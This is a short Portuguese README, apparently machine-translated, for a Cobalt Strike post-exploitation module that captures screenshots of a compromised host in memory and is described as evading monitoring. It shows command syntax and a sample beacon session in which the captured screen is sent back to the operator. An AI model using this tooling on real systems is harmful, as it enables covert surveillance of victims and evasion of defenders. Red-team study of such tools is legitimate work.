
Uma capacidade alternativa de captura de tela para o Cobalt Strike que utiliza WinAPI e não realiza fork & run. Captura de tela baixada na memória.
Uma alternativa de captura de tela para o Cobalt Strike que utiliza WinAPI e não realiza fork & run. Captura baixada em memória.
make0: capturar tela inteira (PID = 0) PID específico: capturar PID específico (funciona mesmo quando minimizado!)
screenshot_bof sem argumentos abrirá uma caixa de diálogo GUIbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
O Cobalt Strike utiliza uma técnica conhecida como fork & run para muitos de seus recursos pós-ex, incluindo o comando de captura de tela. Embora esse comportamento forneça estabilidade, agora é bem conhecido e fortemente monitorado. Este BOF tem como objetivo fornecer uma versão mais segura em termos de OPSEC da capacidade de captura de tela.
aviso legal usual aqui, não sou responsável por quaisquer crimes contra a humanidade que você possa cometer ou guerra nuclear que possa causar usando este pedaço de código mal escrito.